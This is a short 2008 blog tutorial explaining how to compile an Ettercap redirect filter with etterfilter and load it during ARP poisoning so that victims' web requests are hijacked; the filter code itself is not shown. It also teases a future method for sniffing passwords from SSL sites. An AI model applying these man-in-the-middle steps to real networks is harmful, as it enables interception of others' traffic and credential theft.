Ettercap Update

security tutorials 4

again!Important

Well, it happens to the best of us, I wrote a lot about writing the actual filters, and what they can do, but never told you how compile/use them (oops). So, lets take this quick and easy example of a filter I wrote;

Lets say we wrote this in gedit (notepad for you windows folk), we need to save it! We save it for the time being as redirect.filter. Now, in its current state its a load of hoopla that ettercap can’t use, lets change that. We need to use a program that came with ettercap called “etterfilter”. Find this program in your installation directory if you are in windows, and paste redirect.filter into that directory (makes life easier). Now open up a command line and navigate to that directory, by doing something like,

Now, to actually put this filter into use, we are going to use a pretty similar process to the plugins. Open up ettercap, select your sniffing device, scan for some hosts, and go about arp poisoning just as you normally would.

Here is where it differs! Before you select start sniffing, go to the top bar and select filters, ‘load a filter.’ Find whatever .ef file you are going to use (haven’t tried more then 1 at a time yet, I’ll update), and select it. Now you can start sniffing. If the filter works, when someone tries to go to a new webpage, they will get farked, and the message “redirect success” (in this example) will be shown in the info box.

I have some more interesting examples to be shown, including a way of sniffing some passwords from SSL’ed sites, basically its alot like phishing. Should be fun

posted by jaymill230

admin @ April 15, 2008